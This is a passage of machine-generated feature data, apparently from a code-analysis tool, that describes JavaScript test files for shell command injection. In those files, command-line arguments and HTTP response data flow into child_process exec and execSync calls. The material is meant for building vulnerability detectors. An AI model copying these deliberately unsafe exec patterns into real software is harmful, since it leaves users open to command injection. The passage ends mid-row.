autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:0 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:1:1:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:6 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:6 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:5:1:33 | cp = re ... ocess") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:16 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | require ... ocess") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:18:1:32 | "child_process" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:1:21:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:1:21:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:1:21:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | this | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:3:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | 'arguments' object of anonymous function | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | exceptional return of anonymous function | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | return of anonymous function | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:3:2:21:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:8 | cp.exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | exceptional return of cp.exec ... s.argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | exceptional return of cp.exec ... s.argv) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | exceptional return of cp.exec ... s.argv) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | exceptional return of cp.exec ... s.argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | exceptional return of cp.exec ... s.argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:5:4:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:5:4:8 | exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:5:4:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:5:4:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:16 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:16 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:16 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:16 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:16 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:10:4:21 | process.argv | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:18:4:21 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:18:4:21 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:18:4:21 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:18:4:21 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:18:4:21 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:8 | cp.exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | exceptional return of cp.exec ... rgv[0]) | 